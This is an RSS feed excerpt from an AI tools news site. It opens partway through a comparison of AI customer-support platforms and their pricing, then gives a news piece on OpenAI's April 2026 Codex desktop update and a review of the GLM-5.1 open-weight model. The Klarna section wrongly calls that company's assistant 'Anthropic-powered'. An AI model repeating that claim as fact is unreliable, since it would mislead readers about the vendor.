<p>Crescendo takes a different approach: it's not a pure software platform. The service combines AI agents with a team of 3,000+ human agents who handle anything the AI can't resolve. You're outsourcing customer support operations, not just buying software.</p>
<p>Pricing reflects this: $2.99/resolution plus a $2,900/month platform fee. That's higher per-resolution than most alternatives, but it includes 24/7 human coverage, 50+ language support, and quality assurance - services that cost extra elsewhere.</p>
<p>The vendor claims 70-90% AI resolution with 99.8% accuracy. The accuracy number is unverified. The value proposition is clearest for companies that want to remove their internal support operations entirely rather than augment an existing team.</p>
<p><img src="/images/tools/best-ai-customer-support-tools-2026-chatbot-interface.jpg" alt="AI customer support chat interface on a screen">
<em>AI support platforms surface knowledge base answers and customer history directly inside the chat interface, reducing time-to-resolution.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="gorgias-ai---best-for-e-commerce">Gorgias AI - Best for E-Commerce</h2>
<p>Gorgias is the only platform here built specifically for e-commerce, and its 15,000+ brand customers (Kith, Arc'teryx, Reebok) confirm the fit. Every ticket opens with the customer's full order history, shipping status, and return eligibility visible alongside the conversation - no tab-switching, no manual CRM lookup.</p>
<p>The AI Agent feature resolves 60% of support inquiries according to Gorgias's own data. Pricing for AI automation is $1.00/automated resolved conversation on monthly billing, or $0.90 on annual. Note the double-billing structure: you also pay the helpdesk ticket charge on top of the AI automation fee.</p>
<p>If you're not in e-commerce, Gorgias has limited value. The product doesn't handle SaaS subscription workflows, doesn't integrate cleanly with Salesforce, and lacks the deep customization options that enterprise support teams need.</p>
<p><strong>Voice:</strong> Gorgias doesn't offer native voice. This is a live chat, email, and social messaging tool.</p>
<hr>
<h2 id="help-scout-ai---best-budget-option-for-small-teams">Help Scout AI - Best Budget Option for Small Teams</h2>
<p>Help Scout is the simplest platform in this comparison. It's a shared inbox tool for small support teams with AI features layered on top: AI Answers (customer-facing chatbot), AI Drafts (agent reply suggestions), AI Assist (tone and translation), and AI Summarize (thread condensing).</p>
<p>Plans run $25/user/month (Standard), $45/user/month (Plus), and $75/user/month (Pro). AI Answers costs $0.75 per AI-resolved conversation, the lowest published per-resolution rate in the market. New accounts get three months of unlimited AI Answers free.</p>
<p>The AI Answers chatbot is straightforward: it answers from your Docs knowledge base and hands off to a human if it can't resolve. There's no voice support, no advanced workflow engine, no enterprise integrations beyond standard webhooks. For a 5-20 person support team that wants deflection on simple FAQ traffic without a six-figure contract, Help Scout is the right starting point.</p>
<hr>
<h2 id="hubspot-service-hub-ai---best-for-hubspot-centric-teams">HubSpot Service Hub AI - Best for HubSpot-Centric Teams</h2>
<p>HubSpot's Breeze AI Customer Agent is available in Service Hub Professional ($90/seat/month) and Enterprise ($150/seat/month). The AI works inside the HubSpot CRM - it sees every customer interaction, deal, and support ticket in the same data model.</p>
<p>The pricing structure uses Breeze credits: $10 per 1,000 credits. Customer Agent consumes 100 credits per conversation, which works out to roughly $1 per conversation. Plans include a 3,000-credit allocation (roughly 30 conversations) per seat per month.</p>
<p>For teams already using HubSpot for sales and marketing, the Service Hub AI makes sense: it runs on the same data without any integration work. For teams not in the HubSpot ecosystem, the seat cost is hard to justify when Fin or Help Scout covers the same resolution workflow at lower cost per conversation.</p>
<hr>
<h2 id="pricing-model-comparison">Pricing Model Comparison</h2>
<p>This table covers only publicly published pricing. &quot;Contact sales&quot; means the vendor has no published list price.</p>
<table>
  <thead>
      <tr>
          <th>Platform</th>
          <th>Base fee</th>
          <th>Per-unit cost</th>
          <th>Minimum commitment</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Intercom Fin 3</td>
          <td>$29/seat/month</td>
          <td>$0.99/resolution</td>
          <td>None</td>
      </tr>
      <tr>
          <td>Help Scout AI</td>
          <td>$25/seat/month</td>
          <td>$0.75/AI resolution</td>
          <td>None</td>
      </tr>
      <tr>
          <td>Kustomer</td>
          <td>$89/seat/month</td>
          <td>$0.60/AI conversation</td>
          <td>8 seats</td>
      </tr>
      <tr>
          <td>Gorgias AI</td>
          <td>Ticket-based plans</td>
          <td>$0.90-$1.00/AI resolution</td>
          <td>None</td>
      </tr>
      <tr>
          <td>HubSpot Service Hub</td>
          <td>$90/seat/month</td>
          <td>~$1.00/AI conversation</td>
          <td>None</td>
      </tr>
      <tr>
          <td>Zendesk + Advanced AI</td>
          <td>$115/seat/month + $50/seat AI add-on</td>
          <td>$1.50-$2.00/AR</td>
          <td>None</td>
      </tr>
      <tr>
          <td>Crescendo</td>
          <td>$2,900/month</td>
          <td>$2.99/resolution</td>
          <td>Monthly</td>
      </tr>
      <tr>
          <td>Ada</td>
          <td>~$30K/year</td>
          <td>~$1.00-$3.50/resolution</td>
          <td>~$30K/year</td>
      </tr>
      <tr>
          <td>Agentforce</td>
          <td>$165/seat/month</td>
          <td>$2.00/conversation</td>
          <td>None</td>
      </tr>
      <tr>
          <td>Decagon</td>
          <td>Contact sales</td>
          <td>Contact sales</td>
          <td>~$100K/year (est.)</td>
      </tr>
      <tr>
          <td>Sierra</td>
          <td>Contact sales</td>
          <td>Contact sales</td>
          <td>~$150K/year</td>
      </tr>
      <tr>
          <td>Forethought</td>
          <td>Contact sales</td>
          <td>Contact sales</td>
          <td>~$56K/year (est.)</td>
      </tr>
  </tbody>
</table>
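<p>To compare these pricing models on an equal footing, the sketch below estimates monthly cost for one hypothetical workload - 20 seats and 5,000 AI-handled conversations a month - using the published list prices above. Resolution rates are assumptions (vendor-published where available), so treat the output as a rough ranking rather than a quote.</p>
<pre><code class="language-python"># Rough monthly-cost comparison for one hypothetical workload, using the list
# prices in the table above. Resolution rates are assumptions per vendor.
SEATS, CONVERSATIONS = 20, 5_000

def monthly(per_seat=0.0, flat=0.0, per_unit=0.0, unit="resolution", res_rate=0.6):
    units = CONVERSATIONS * res_rate if unit == "resolution" else CONVERSATIONS
    return SEATS * per_seat + flat + units * per_unit

estimates = {
    "Intercom Fin 3":  monthly(per_seat=29,  per_unit=0.99, res_rate=0.66),
    "Help Scout AI":   monthly(per_seat=25,  per_unit=0.75),
    "Kustomer":        monthly(per_seat=89,  per_unit=0.60, unit="conversation"),
    "HubSpot Service": monthly(per_seat=90,  per_unit=1.00, unit="conversation"),
    "Zendesk + AI":    monthly(per_seat=165, per_unit=1.50),   # Suite Pro + add-on
    "Crescendo":       monthly(flat=2_900,   per_unit=2.99, res_rate=0.70),
}
for name, cost in sorted(estimates.items(), key=lambda kv: kv[1]):
    print(f"{name.ljust(18)} ${cost:,.0f}/month")
</code></pre>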
<hr>
<h2 id="the-klarna-reference-point">The Klarna Reference Point</h2>
<p>Klarna's public deployment data is the most cited benchmark in AI customer support and worth looking at directly. In the first month of running their Anthropic-powered assistant, Klarna handled 2.3 million conversations through AI - two-thirds of all customer service interactions. Resolution time dropped from 11 minutes to 2 minutes. Klarna says customer satisfaction scores held steady at human-agent parity.</p>
<p>The assistant does the equivalent work of 700 full-time agents and saved $60 million. Per-transaction customer service costs fell 40% over two years.</p>
<p>Two things are true simultaneously: those numbers are impressive and Klarna had to walk back its &quot;AI-first&quot; strategy partially in 2025, reintroducing human agents for complex cases. The 75% self-resolution rate was real, but the 25% of cases that escalated required more human expertise than the cost savings justified removing. Pure deflection rates overstate deployment success; what matters is whether customers with complex problems still get resolved.</p>
<p>None of the 12 platforms in this article built Klarna's custom infrastructure. They offer configurable AI on top of existing helpdesk data. Klarna's numbers are the ceiling, not the benchmark.</p>
<hr>
<h2 id="best-picks">Best Picks</h2>
<p><strong>Best overall - mid-market SaaS, consumer tech, fintech:</strong> Intercom Fin 3. The $0.99/resolution pricing is the fairest cost model in the market, the Fin 2 resolution data is the largest published dataset in the category, and Fin 3's Procedures give engineering teams genuine workflow control without hard-coding. The 50% automation rate guarantee removes pricing risk during ramp-up.</p>
<p><strong>Best for e-commerce brands:</strong> Gorgias AI. The order-context-in-every-ticket feature removes the primary friction in e-commerce support. At $0.90/resolved conversation on annual billing, it's cost-competitive with Fin for the right workload.</p>
<p><strong>Best for enterprise with Salesforce investment:</strong> Agentforce. The data access story is compelling if your customer records live in Salesforce. At $2/conversation the cost model gets expensive, but the integration depth justifies it for teams that have already built on Service Cloud.</p>
<p><strong>Best budget option for small teams:</strong> Help Scout AI at $0.75/AI-resolved conversation is the lowest published per-resolution rate in the market and requires no long-term contract.</p>
<p><strong>For complex enterprise deployments with voice requirements:</strong> Sierra or Decagon, depending on whether your budget supports a $150K+ minimum. Both have credible public deployment data and neither requires buying into a separate helpdesk vendor.</p>
<p>If you're evaluating general-purpose AI agent frameworks rather than support-specific products, the <a href="/tools/best-ai-agent-frameworks-2026">best AI agent frameworks for 2026</a> covers the build-vs-buy tradeoff from an engineering perspective. For teams wanting to build custom support bots on top of LLM infrastructure, <a href="/tools/best-ai-chatbot-builders-2026">best AI chatbot builders 2026</a> covers the low-code and no-code build options.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="whats-the-cheapest-ai-customer-support-option-that-actually-works">What's the cheapest AI customer support option that actually works?</h3>
<p>Help Scout AI at $0.75/AI-resolved conversation is the lowest published per-resolution rate, with no minimum contract. For small teams under 20 agents, the platform plus AI tier runs under $2,500/month total.</p>
<h3 id="which-platforms-support-voice-ai-natively">Which platforms support voice AI natively?</h3>
<p>Sierra (voice-first architecture), Kustomer (native at no extra cost), Intercom Fin 3 (28 languages, 30-40% latency improvement in v3), Decagon (voice included), and Crescendo (managed voice included in base fee). Zendesk and HubSpot handle voice via separate telephony products.</p>
<h3 id="can-any-of-these-tools-be-self-hosted">Can any of these tools be self-hosted?</h3>
<p>No platform in this comparison offers a self-hosted tier. If data residency or self-hosting is a hard requirement, you'd need to evaluate open-source alternatives or build on models running in your own infrastructure. The <a href="/tools/best-ai-agent-frameworks-2026">best AI agent frameworks</a> covers open-source options.</p>
<h3 id="is-forethought-still-worth-evaluating-after-the-zendesk-acquisition">Is Forethought still worth evaluating after the Zendesk acquisition?</h3>
<p>For teams already on Zendesk, yes - the combined platform is the most feature-complete in the category. For teams on other helpdesks, assess with caution: Forethought's roadmap now runs through Zendesk's product priorities.</p>
<h3 id="what-does-resolution-rate-actually-mean-across-vendors">What does &quot;resolution rate&quot; actually mean across vendors?</h3>
<p>It differs by vendor. Intercom counts a resolution when a customer confirms the issue is solved or doesn't escalate after Fin's reply. Kustomer's 40% Vuori figure counts conversations where no human agent took over. Decagon's numbers come from customer case studies with customer-defined definitions. There's no industry standard, so compare cautiously.</p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://www.intercom.com/pricing">Intercom Fin AI Pricing</a> - official Intercom pricing page with $0.99/outcome model</li>
<li><a href="https://www.intercom.com/blog/whats-new-with-fin-3/">Fin 3 announcement - The Intercom Blog</a> - Fin 3 features, Fin 2 resolution rate (66% avg), Simulations and Procedures details</li>
<li><a href="https://www.eesel.ai/blog/zendesk-suite-pricing">Zendesk Suite Pricing Guide - eesel AI</a> - Suite plan tiers and AI add-on costs breakdown</li>
<li><a href="https://support.zendesk.com/hc/en-us/articles/6970583409690-About-AI-agents">Zendesk AI Agents - About AI agents</a> - AR pricing tiers ($1.50/$2.00)</li>
<li><a href="https://techcrunch.com/2025/11/21/bret-taylors-sierra-reaches-100m-arr-in-under-two-years/">Sierra reaches $100M ARR - TechCrunch</a> - $100M ARR in 21 months, November 2025</li>
<li><a href="https://techcrunch.com/2024/10/28/bret-taylors-customer-service-ai-startup-just-raised-175m/">Sierra raises $175M - TechCrunch</a> - fundraising history; $350M/10B valuation reported separately in September 2025</li>
<li><a href="https://techcrunch.com/2026/04/09/sierras-bret-taylor-says-the-era-of-clicking-buttons-is-over/">Sierra's Bret Taylor: era of clicking buttons is over - TechCrunch</a> - April 2026 interview</li>
<li><a href="https://www.customerexperiencedive.com/news/klarna-ai-slash-customer-service-costs/748647/">Klarna AI customer service costs - CX Dive</a> - $60M savings, 40% per-transaction cost reduction, 2.3M conversations handled</li>
<li><a href="https://www.cmswire.com/the-wire/kustomer-launches-the-first-ai-native-customer-service-platform/">Kustomer AI-Native Platform Launch - CMSWire</a> - October 2024 relaunch, $0.60/engaged conversation pricing, native voice</li>
<li><a href="https://www.helpscout.com/pricing/">Help Scout Pricing</a> - official Help Scout pricing, $0.75/AI resolution</li>
<li><a href="https://www.crescendo.ai/pricing">Crescendo Pricing</a> - $2.99/resolution + $2,900/month base</li>
<li><a href="https://www.eesel.ai/blog/gorgias-ai-pricing-complete-2025-cost-breakdown-and-guide">Gorgias AI Pricing - eesel AI analysis</a> - $0.90-$1.00/automated resolution breakdown</li>
<li><a href="https://www.featurebase.app/blog/ada-cx-pricing">Ada CX pricing anchor - Featurebase analysis</a> - $30K/year minimum, $1-$3.50/resolution range</li>
<li><a href="https://www.salesforce.com/agentforce/">Salesforce Agentforce</a> - official Agentforce product page</li>
<li><a href="https://forethought.ai/">Zendesk acquires Forethought - Forethought.ai</a> - March 2026 acquisition announcement</li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Tools</category><media:content url="https://awesomeagents.ai/images/tools/best-ai-customer-support-tools-2026_hu_79a90d837bbdca8e.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/tools/best-ai-customer-support-tools-2026_hu_79a90d837bbdca8e.jpg" width="1200" height="675"/></item><item><title>OpenAI Gives Codex Desktop Control and 111 Plugins</title><link>https://awesomeagents.ai/news/openai-codex-computer-use-parallel-agents/</link><pubDate>Fri, 17 Apr 2026 19:56:49 +0200</pubDate><guid>https://awesomeagents.ai/news/openai-codex-computer-use-parallel-agents/</guid><description>&lt;p>OpenAI shipped a major update to its Codex desktop app on April 16, adding background computer use for Mac, an in-app browser built on its Atlas engine, image generation via gpt-image-1.5, and 111 new plugins. Together, these features push Codex from an agentic coding assistant into something closer to a general-purpose desktop automation layer. The timing isn't subtle: Anthropic announced remote Mac control for &lt;a href="/news/claude-code-desktop-redesign-parallel-agents/">Claude Code last month&lt;/a>, and OpenAI is now matching it feature for feature.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>OpenAI shipped a major update to its Codex desktop app on April 16, adding background computer use for Mac, an in-app browser built on its Atlas engine, image generation via gpt-image-1.5, and 111 new plugins. Together, these features push Codex from an agentic coding assistant into something closer to a general-purpose desktop automation layer. The timing isn't subtle: Anthropic announced remote Mac control for <a href="/news/claude-code-desktop-redesign-parallel-agents/">Claude Code last month</a>, and OpenAI is now matching it feature for feature.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Codex can now see and operate Mac apps in the background using its own cursor, with multiple agents running in parallel</li>
<li>A built-in browser based on OpenAI's Atlas engine lets users comment directly on pages during development</li>
<li>111 new plugins add integrations with Atlassian Rovo, CircleCI, CodeRabbit, GitLab Issues, Microsoft Suite, and Render</li>
<li>Computer use is blocked in the EU, UK, and Switzerland; memory is unavailable for Enterprise, Education, EU, and UK accounts</li>
</ul>
</div>
<p>The table below shows where Codex now stands against Anthropic's Claude Code across the features that matter most for agentic development workflows.</p>
<table>
  <thead>
      <tr>
          <th>Feature</th>
          <th>Codex (April 2026)</th>
          <th>Claude Code</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Computer use</td>
          <td>Yes - Mac only, excl. EU/UK/CH</td>
          <td>Yes - Mac and desktop</td>
      </tr>
      <tr>
          <td>Parallel agents</td>
          <td>Yes</td>
          <td>Yes (since April 15 rebuild)</td>
      </tr>
      <tr>
          <td>In-app browser</td>
          <td>Atlas-based, localhost for now</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Image generation</td>
          <td>gpt-image-1.5</td>
          <td>No native image gen</td>
      </tr>
      <tr>
          <td>Plugin integrations</td>
          <td>111</td>
          <td>MCP servers (no fixed count)</td>
      </tr>
      <tr>
          <td>Memory</td>
          <td>Preview - no Enterprise, EU, UK</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Pay-as-you-go</td>
          <td>Enterprise and Business</td>
          <td>API only</td>
      </tr>
  </tbody>
</table>
<h2 id="whats-new-in-the-april-16-update">What's New in the April 16 Update</h2>
<h3 id="background-computer-use">Background Computer Use</h3>
<p>The core feature of the update is computer use: Codex can see, click, and type into Mac apps while running in the background, without interfering with other work. Developers can run multiple agents simultaneously - one testing a mobile UI in Simulator while another pushes a commit - with each task isolated from the others.</p>
<p>OpenAI's <a href="https://developers.openai.com/codex/app/computer-use">developer documentation</a> is specific about scope. Codex can interact with windows, menus, keyboard input, and clipboard state in target apps. It cannot automate terminal apps or Codex itself (a deliberate security restriction), and it cannot authenticate as an administrator or approve system permission prompts.</p>
<p>The permission model requires users to grant both macOS Screen Recording and Accessibility access, then selectively approve individual apps on a per-session basis.</p>
<p><img src="/images/news/openai-codex-computer-use-parallel-agents-approval.jpg" alt="Codex computer use approval dialog for a Mac app">
<em>The computer use approval dialog asks users to authorize each app individually before Codex can interact with it.</em>
<small>Source: developers.openai.com</small></p>
<h3 id="the-atlas-browser">The Atlas Browser</h3>
<p>Alongside computer use, Codex now ships with an in-app browser based on OpenAI's proprietary Atlas engine. In its current form, it lets developers comment directly on pages served from local dev servers, giving the agent precise context about which elements to modify without switching to an external browser.</p>
<p>OpenAI's stated intent is to expand Atlas to &quot;fully command the browser beyond web applications on localhost&quot; - meaning general web browsing - but that isn't live yet.</p>
<h3 id="image-generation-and-visual-tooling">Image Generation and Visual Tooling</h3>
<p>Image generation via gpt-image-1.5 is now available directly inside Codex threads. The use cases are narrow but practical: generating placeholder images, iterating on mockup concepts, and creating slide visuals without leaving the development environment. Rich file previews for PDFs and spreadsheets, multiple terminal tabs, GitHub review integration, and artifact previews round out the quality-of-life additions in this release.</p>
<h2 id="111-plugins-the-app-store-moment">111 Plugins: The App Store Moment</h2>
<p>OpenAI has added 111 new plugins to the <a href="/news/openai-codex-plugin-marketplace/">Codex plugin ecosystem</a>, bringing together skills, app integrations, and MCP server configurations into a single installable unit. Named integrations include Atlassian Rovo, CircleCI, CodeRabbit, GitLab Issues, Microsoft Suite, and Render.</p>
<p>The framing from OpenAI is that plugins let teams package reusable workflows - for example, a plugin that reads a project's Slack channel and Google Calendar to create a daily task list, then routes issues to the appropriate agent.</p>
<p><img src="/images/news/openai-codex-computer-use-parallel-agents-multitask.jpg" alt="Codex multitask interface showing parallel agents">
<em>Codex running multiple tasks in parallel inside the desktop app.</em>
<small>Source: developers.openai.com</small></p>
<p>Also added: thread reuse so agents can resume interrupted work, and long-horizon scheduling that lets Codex work across tasks that span days or weeks. Memory - a preview feature that lets Codex recall preferences, tech stacks, and workflow patterns across sessions - completes the picture, though its availability is sharply restricted (more on that below).</p>
<h2 id="what-it-does-not-tell-you">What It Does Not Tell You</h2>
<h3 id="the-geography-problem">The Geography Problem</h3>
<p>Computer use isn't available in the European Economic Area, the United Kingdom, or Switzerland. Memory is similarly unavailable for Enterprise, Education, EU, and UK users. These are two of the four headline features in this update. For organizations operating under GDPR or UK data protection law - which includes a major share of enterprise software teams - the April 16 update delivers less than the headlines suggest.</p>
<p>The restrictions aren't accidental; they reflect the regulatory pressure that makes screen-recording-based computer use genuinely difficult to ship in Europe. OpenAI hasn't said when, or whether, these restrictions will lift.</p>
<h3 id="the-memory-fine-print">The Memory Fine Print</h3>
<p>The memory feature is in preview and excluded from Enterprise accounts - the segment most likely to need persistent workflow context. Individual users on Pro, Max, and Team plans can access it, but Enterprise deployments remain stateless. Teams assessing Codex for professional workflows should treat memory as aspirational for now, not a production capability.</p>
<h3 id="the-browser-ceiling">The Browser Ceiling</h3>
<p>The Atlas browser is built for localhost development. Pointing it at production URLs or external services is outside its current scope. The roadmap phrase &quot;fully command the browser&quot; is OpenAI acknowledging that the current implementation is incomplete - not announcing a feature that exists today.</p>
<hr>
<p>Taken overall, this update closes a visible gap between Codex and <a href="/leaderboards/coding-benchmarks-leaderboard/">Claude Code's agentic capabilities</a>. The computer use architecture, the plugin depth, and the Atlas browser represent genuine additions that enterprise developers will want to evaluate. The geographic restrictions and the memory exclusions are real constraints that'll matter to a large share of professional users. OpenAI is catching up - but in parts of the world where it counts most commercially, Anthropic still has the open field.</p>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://techcrunch.com/2026/04/16/openai-takes-aim-at-anthropic-with-beefed-up-codex-that-gives-it-more-power-over-your-desktop/">OpenAI Codex April 2026 Update - TechCrunch</a></li>
<li><a href="https://developers.openai.com/codex/app/computer-use">Codex Computer Use - OpenAI Developer Docs</a></li>
<li><a href="https://www.macrumors.com/2026/04/16/openai-codex-mac-update/">OpenAI Codex Mac Update - MacRumors</a></li>
<li><a href="https://9to5mac.com/2026/04/16/openais-codex-app-adds-three-key-features-for-expanding-beyond-agentic-coding/">Codex Three Key Features - 9to5Mac</a></li>
<li><a href="https://smartscope.blog/en/generative-ai/chatgpt/codex-desktop-major-update-april-2026/">SmartScope Codex Desktop Update Analysis</a></li>
</ul>
]]></content:encoded><dc:creator>Elena Marchetti</dc:creator><category>News</category><media:content url="https://awesomeagents.ai/images/news/openai-codex-computer-use-parallel-agents_hu_3aca93d3a027b51f.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/news/openai-codex-computer-use-parallel-agents_hu_3aca93d3a027b51f.jpg" width="1200" height="675"/></item><item><title>GLM-5.1 Review: Open-Source Model Tops SWE-Bench Pro</title><link>https://awesomeagents.ai/reviews/review-glm-5-1/</link><pubDate>Fri, 17 Apr 2026 17:57:45 +0200</pubDate><guid>https://awesomeagents.ai/reviews/review-glm-5-1/</guid><description>&lt;p>On April 7, 2026, Z.ai (formerly Zhipu AI) released the weights of GLM-5.1 under the MIT license and posted a benchmark table that made a lot of AI engineers do a double take. A 754-billion-parameter open-weight model, trained completely on Huawei Ascend chips with no US silicon, had taken the top score on SWE-Bench Pro - beating GPT-5.4 and &lt;a href="/reviews/review-claude-opus-4-6/">Claude Opus 4.6&lt;/a>. The two-point margin is modest, but the symbolic weight is not.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>On April 7, 2026, Z.ai (formerly Zhipu AI) released the weights of GLM-5.1 under the MIT license and posted a benchmark table that made a lot of AI engineers do a double take. A 754-billion-parameter open-weight model, trained completely on Huawei Ascend chips with no US silicon, had taken the top score on SWE-Bench Pro - beating GPT-5.4 and <a href="/reviews/review-claude-opus-4-6/">Claude Opus 4.6</a>. The two-point margin is modest, but the symbolic weight is not.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li><strong>8.1/10</strong> - the best open-weight model for long-horizon agentic coding, with caveats</li>
<li>Tops SWE-Bench Pro (58.4) ahead of GPT-5.4 (57.7) and Claude Opus 4.6 (57.3); also leads CyberGym with 68.7</li>
<li>Text-only (no vision), slower generation speed, and key benchmark numbers come from Z.ai's own testing</li>
<li>Use it if you're building autonomous coding agents or long-running engineering pipelines; skip it if you need real-time IDE completions or multimodal workflows</li>
</ul>
</div>
<h2 id="where-glm-51-comes-from">Where GLM-5.1 Comes From</h2>
<p>Z.ai is a Beijing-based lab spun out of Tsinghua University's KEG research group. The company appeared on the US Entity List in January 2025, cutting off legal access to Nvidia's H100, H200, and B200 GPUs. Most frontier AI labs outside China treat those chips as oxygen. Z.ai had to build without them.</p>
<p>The entire GLM-5 family - including 5.1 - was trained on around 100,000 Huawei Ascend 910B chips running MindSpore, Huawei's homegrown deep learning framework. The decision wasn't ideological. It was the only available path under US export controls. That constraint makes the benchmark results much more interesting than they'd be otherwise.</p>
<p>On January 8, 2026, Zhipu completed a Hong Kong IPO - the first publicly traded foundation model company in the world - raising roughly HKD 4.35 billion (around $558 million USD) at a valuation near $31.3 billion. The GLM-5.1 release came three months later, and the timing isn't coincidental. The company needs to justify that valuation with technical output.</p>
<p>The GLM-5 base model <a href="/news/glm-5-china-frontier-model-huawei-chips/">launched in February 2026</a>. GLM-5.1 is a post-training refinement focused specifically on agentic coding tasks and long-horizon execution. The architecture is unchanged; the improvements come from training methodology.</p>
<h2 id="architecture-and-specifications">Architecture and Specifications</h2>
<p>GLM-5.1 uses a Mixture-of-Experts design the company calls GLM_MOE_DSA (Dynamic Sparse Attention), with 754 billion total parameters and 40 billion active per forward pass. That active-parameter count places it in the same inference-compute neighborhood as models like <a href="/reviews/review-deepseek-v3-2/">DeepSeek V3.2</a> and <a href="/reviews/review-kimi-k2-5/">Kimi K2.5</a>, which both use similar MoE approaches.</p>
<div class="news-tldr">
<p><strong>Key Specs</strong></p>
<table>
  <thead>
      <tr>
          <th>Spec</th>
          <th>Value</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Parameters (total)</td>
          <td>754B (MoE)</td>
      </tr>
      <tr>
          <td>Active parameters</td>
          <td>40B per token</td>
      </tr>
      <tr>
          <td>Context window</td>
          <td>200,000 tokens</td>
      </tr>
      <tr>
          <td>Max output tokens</td>
          <td>128,000</td>
      </tr>
      <tr>
          <td>Modalities</td>
          <td>Text only</td>
      </tr>
      <tr>
          <td>License</td>
          <td>MIT</td>
      </tr>
      <tr>
          <td>Training hardware</td>
          <td>Huawei Ascend 910B</td>
      </tr>
      <tr>
          <td>Release date</td>
          <td>April 7, 2026</td>
      </tr>
  </tbody>
</table>
</div>
<p>The 200K context window with 128K maximum output is an unusually generous combination - most frontier models cap output at 32K or 64K. For long-horizon agentic tasks that generate large code artifacts or iterate across many files, that ceiling matters.</p>
<p>Supported inference frameworks include SGLang (v0.5.10+), vLLM (v0.19.0+), Transformers, KTransformers, and xLLM. Ollama also has the model in its library. The API supports function calling, streaming, structured outputs, context caching, and a thinking mode for extended reasoning.</p>
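<p>A minimal streaming-call sketch, assuming an OpenAI-compatible endpoint such as OpenRouter's hosted GLM-5.1 (the model slug below comes from the OpenRouter listing in the sources; Z.ai's native API may use different base URLs and parameter names):</p>
<pre><code class="language-python"># Minimal streaming chat call against an OpenAI-compatible GLM-5.1 endpoint.
# Assumes the OpenRouter slug "z-ai/glm-5.1"; swap in your provider's values.
from openai import OpenAI

client = OpenAI(
    base_url="https://openrouter.ai/api/v1",
    api_key="YOUR_API_KEY",   # placeholder
)

stream = client.chat.completions.create(
    model="z-ai/glm-5.1",
    messages=[{"role": "user",
               "content": "Refactor this function to remove the N+1 query."}],
    stream=True,
)
for chunk in stream:
    delta = chunk.choices[0].delta.content
    if delta:
        print(delta, end="", flush=True)
</code></pre>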
<p><img src="/images/reviews/review-glm-5-1-chips.jpg" alt="Close-up macro photograph of intricate electronic circuit board components">
<em>GLM-5.1's training ran on Huawei Ascend 910B chips - no NVIDIA hardware anywhere in the stack.</em>
<small>Source: pexels.com</small></p>
<h2 id="benchmarks">Benchmarks</h2>
<p>The headline number is SWE-Bench Pro, but GLM-5.1's benchmark profile is more varied than the press releases suggest.</p>
<table>
  <thead>
      <tr>
          <th>Benchmark</th>
          <th>GLM-5.1</th>
          <th>GPT-5.4</th>
          <th>Claude Opus 4.6</th>
          <th>Gemini 3.1 Pro</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>SWE-Bench Pro</td>
          <td><strong>58.4</strong></td>
          <td>57.7</td>
          <td>57.3</td>
          <td>54.2</td>
      </tr>
      <tr>
          <td>Terminal-Bench 2.0</td>
          <td>63.5</td>
          <td>-</td>
          <td><strong>68.5</strong></td>
          <td>-</td>
      </tr>
      <tr>
          <td>CyberGym</td>
          <td><strong>68.7</strong></td>
          <td>-</td>
          <td>66.6</td>
          <td>-</td>
      </tr>
      <tr>
          <td>GPQA-Diamond</td>
          <td>86.2</td>
          <td>-</td>
          <td>-</td>
          <td><strong>94.3</strong></td>
      </tr>
      <tr>
          <td>AIME 2026</td>
          <td>95.3</td>
          <td><strong>98.7</strong></td>
          <td>98.2</td>
          <td>-</td>
      </tr>
  </tbody>
</table>
<p>On coding-specific work, the picture is positive. SWE-Bench Pro tests real software engineering tasks - applying patches, fixing bugs, implementing features from natural language descriptions - and GLM-5.1's 58.4 is currently the highest public score on that leaderboard. It also leads CyberGym at 68.7, a security task completion benchmark across 1,507 tasks.</p>
<p>The gaps appear on general reasoning. AIME 2026 (advanced math competition problems) has GPT-5.4 at 98.7% and <a href="/reviews/review-claude-opus-4-6/">Claude Opus 4.6</a> at 98.2%, while GLM-5.1 comes in at 95.3. GPQA-Diamond (graduate-level science reasoning) shows an even wider gap against Gemini 3.1 Pro's 94.3%. If your workload is heavy on mathematical derivations or scientific research, this isn't the model to reach for.</p>
<p>One thing worth noting: the SWE-Bench Pro results come from Z.ai's internal testing. Arena.ai independently placed GLM-5.1 third on their Code Arena agentic webdev leaderboard with an Elo rating of 1530, which provides at least partial external validation for the coding performance. But a fully independent evaluation on SWE-Bench Pro from a third-party lab hasn't been published as of this writing. Treat the exact margin over Claude and GPT-5.4 as preliminary.</p>
<h2 id="agentic-capabilities">Agentic Capabilities</h2>
<p>The most compelling part of GLM-5.1 isn't any individual benchmark score. It's the claim that the model can run autonomously for up to eight hours without human checkpoints, completing a full plan-execute-analyze-optimize loop across hundreds of iterations.</p>
<p>Z.ai demonstrated this with two tasks. First: building a complete Linux desktop environment from scratch - file browser, terminal, text editor, system monitor, and playable games - through 655 autonomous iterations in a single session. Second: optimizing a vector database over 178 rounds of autonomous tuning, improving throughput to 6.9 times the original baseline. In a separate CUDA kernel optimization task, the model improved speedup from 2.6x to 35.7x through sustained iterative refinement.</p>
<p>These are company-produced demos, so the usual skepticism applies. But the underlying technical approach - maintaining goal alignment across hundreds of tool calls without strategy drift - addresses a real failure mode of current agentic systems, where models lose context or start tuning for the wrong objective after a few dozen steps.</p>
<p>The practical implication: GLM-5.1 makes more sense as the backbone of an autonomous coding agent than as an interactive assistant. Plug it into a CI/CD pipeline, give it a ticket, and come back later. For real-time IDE completions where latency matters, <a href="/reviews/review-cursor-ide/">Cursor</a> or <a href="/reviews/review-claude-code-cli/">Claude Code</a> with a faster model will feel more responsive.</p>
